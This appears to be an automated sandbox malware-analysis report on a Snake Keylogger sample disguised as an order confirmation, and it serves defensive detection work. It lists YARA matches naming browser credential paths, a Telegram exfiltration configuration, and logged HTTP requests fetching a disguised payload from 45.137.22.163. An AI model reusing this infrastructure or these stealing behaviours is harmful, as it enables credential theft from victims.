Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
order confirmation 46574 -QT-04-0022.exe

Overview

General Information

Sample Name:order confirmation 46574 -QT-04-0022.exe
Analysis ID:608167
MD5:0da15373eabede8f52245ef830d312f9
SHA1:c7781e33383a542bd029a0bda482a063cca4dd76
SHA256:73d38ad110eb78ec1d1c3510f2508c514ded9d52ffc5a01210310c5f789392b0
Tags:exeSnakeKeylogger
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Machine Learning detection for sample
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram Token": "l0gs.l@yandex.com", "Telegram ID": "333bukis"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000000.340523862.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    0000000C.00000000.340523862.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      0000000C.00000000.340523862.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000C.00000000.340523862.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
        • 0x1873e:$x1: $%SMTPDV$
        • 0x1737e:$x2: $#TheHashHere%&
        • 0x186e6:$x3: %FTPDV$
        • 0x17360:$x4: $%TelegramDv$
        • 0x14dac:$x5: KeyLoggerEventArgs
        • 0x1513c:$x5: KeyLoggerEventArgs
        • 0x1876a:$m1: | Snake Keylogger
        • 0x18810:$m1: | Snake Keylogger
        • 0x18964:$m1: | Snake Keylogger
        • 0x18a8a:$m1: | Snake Keylogger
        • 0x18be4:$m1: | Snake Keylogger
        • 0x1870a:$m2: Clipboard Logs ID
        • 0x1891a:$m2: Screenshot Logs ID
        • 0x18a2e:$m2: keystroke Logs ID
        • 0x18c1a:$m3: SnakePW
        • 0x188f2:$m4: \SnakeKeylogger\
        0000000C.00000000.340127336.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 29 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          12.0.order confirmation 46574 -QT-04-0022.exe.400000.10.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
          • 0x1b23e:$a2: \Comodo\Dragon\User Data\Default\Login Data
          • 0x1a427:$a3: \Google\Chrome\User Data\Default\Login Data
          • 0x1a86e:$a4: \Orbitum\User Data\Default\Login Data
          • 0x1b9ef:$a5: \Kometa\User Data\Default\Login Data
          12.0.order confirmation 46574 -QT-04-0022.exe.400000.10.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            12.0.order confirmation 46574 -QT-04-0022.exe.400000.10.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              12.0.order confirmation 46574 -QT-04-0022.exe.400000.10.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                12.0.order confirmation 46574 -QT-04-0022.exe.400000.10.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
                • 0x14924:$s1: UnHook
                • 0x1492b:$s2: SetHook
                • 0x14933:$s3: CallNextHook
                • 0x14940:$s4: _hook
                Click to see the 54 entries

                Sigma Signatures

                There are no malicious signatures, click here to show all signatures.

                Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke (rule): Data: Image: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe, QueryName: checkip.dyndns.org
                Source: Process startedAuthor: frack113: Data: Command: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe, CommandLine: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe, CommandLine|base64offset|contains: r*', Image: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe, NewProcessName: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe, OriginalFileName: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe, ParentCommandLine: "C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe" , ParentImage: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe, ParentProcessId: 6824, ParentProcessName: order confirmation 46574 -QT-04-0022.exe, ProcessCommandLine: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe, ProcessId: 6568, ProcessName: order confirmation 46574 -QT-04-0022.exe

                Snort Signatures

                No Snort rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.12.unpackMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram Token": "l0gs.l@yandex.com", "Telegram ID": "333bukis"}
                Multi AV Scanner detection for submitted file
                Source: order confirmation 46574 -QT-04-0022.exeVirustotal: Detection: 24%Perma Link
                Source: order confirmation 46574 -QT-04-0022.exeReversingLabs: Detection: 61%
                Machine Learning detection for sample
                Source: order confirmation 46574 -QT-04-0022.exeJoe Sandbox ML: detected
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.12.unpackAvira: Label: TR/ATRAPS.Gen
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.8.unpackAvira: Label: TR/ATRAPS.Gen
                Source: 12.2.order confirmation 46574 -QT-04-0022.exe.400000.0.unpackAvira: Label: TR/ATRAPS.Gen
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.6.unpackAvira: Label: TR/ATRAPS.Gen
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.4.unpackAvira: Label: TR/ATRAPS.Gen
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.10.unpackAvira: Label: TR/ATRAPS.Gen
                Source: order confirmation 46574 -QT-04-0022.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                Source: unknownHTTPS traffic detected: 188.114.97.7:443 -> 192.168.2.4:49746 version: TLS 1.0
                Source: order confirmation 46574 -QT-04-0022.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 014ECBC0h12_2_014EC1D7
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 014ED5E8h12_2_014ED1D0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 014EE43Fh12_2_014EE182
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 014EE89Fh12_2_014EE5E2
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 014EECFFh12_2_014EEA40
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 014ED021h12_2_014ECD60
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 014EDFDFh12_2_014EDCF6
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 014EF15Fh12_2_014EEEA1
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 014ED5E8h12_2_014ED516
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_014EB6F8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_014EBD2B
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_014EBF0C
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 0654B4F1h12_2_0654B248
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 06548981h12_2_065486D8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 0654BDA1h12_2_0654BAF8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 0654B949h12_2_0654B6A0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 0654C1F9h12_2_0654BF50
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 06548DD9h12_2_06548B30
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 06549689h12_2_065493E0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 06549231h12_2_06548F88
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 0654C651h12_2_0654C3A8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 0654CF01h12_2_0654CC58
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 0654CAA9h12_2_0654C800
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 06549AE1h12_2_06549838
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 0654A391h12_2_0654A0E8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 06549F39h12_2_06549C90
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 0654D359h12_2_0654D0B0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 0654A7E9h12_2_0654A540
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 0654DC09h12_2_0654D960
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 0654D7B1h12_2_0654D508
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 0654B099h12_2_0654ADF0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 0654AC41h12_2_0654A998
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 0654E061h12_2_0654DDB8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 06572979h12_2_065726D0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 06575991h12_2_065756E8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 065736A9h12_2_06573400
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 06574832h12_2_06574588
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 06575539h12_2_06575290
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 06576699h12_2_065763F0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 065743B1h12_2_06574108
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 065750E1h12_2_06574E38
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 06576241h12_2_06575F98
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 06573251h12_2_06572FA8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 06573F59h12_2_06573CB0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 06572DF9h12_2_06572B50
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 06575DE9h12_2_06575B40
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 06573B01h12_2_06573858
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then jmp 06574C89h12_2_065749E0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_065708F0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_065708E0

                Networking

                barindex
                May check the online IP address of the machine
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeDNS query: name: checkip.dyndns.org
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: global trafficHTTP traffic detected: GET /xml/84.17.52.18 HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /order_confirmation_46574_-QT-04-0022_Yszciyqc.jpg HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 188.114.97.7 188.114.97.7
                Source: Joe Sandbox ViewIP Address: 188.114.97.7 188.114.97.7
                Source: unknownHTTPS traffic detected: 188.114.97.7:443 -> 192.168.2.4:49746 version: TLS 1.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342441880.0000000002791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.163
                Source: order confirmation 46574 -QT-04-0022.exeString found in binary or memory: http://45.137.22.163/order_confirmation_46574_-QT-04-0022_Yszciyqc.jpg
                Source: order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.530177051.0000000002FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.530177051.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.529963632.0000000002F41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.529963632.0000000002F41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.343064408.00000000037F2000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342975236.0000000003791000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.527594880.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.529963632.0000000002F41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org4;k
                Source: order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.530177051.0000000002FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgD8;k
                Source: order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.528730509.00000000010AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                Source: order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.530209982.0000000003008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://freegeoip.app
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342441880.0000000002791000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.529963632.0000000002F41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.343064408.00000000037F2000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342975236.0000000003791000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.527594880.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.530177051.0000000002FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://freegeoip.app
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.343064408.00000000037F2000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342975236.0000000003791000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.527594880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.530177051.0000000002FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://freegeoip.app/xml/
                Source: order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.530177051.0000000002FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://freegeoip.app/xml/84.17.52.18
                Source: order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.530177051.0000000002FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://freegeoip.app/xml/84.17.52.18x
                Source: order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.530177051.0000000002FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://freegeoip.app4;k
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342475474.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342692541.000000000291D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342475474.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342692541.000000000291D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342475474.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342692541.000000000291D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
                Source: unknownDNS traffic detected: queries for: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET /xml/84.17.52.18 HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /order_confirmation_46574_-QT-04-0022_Yszciyqc.jpg HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
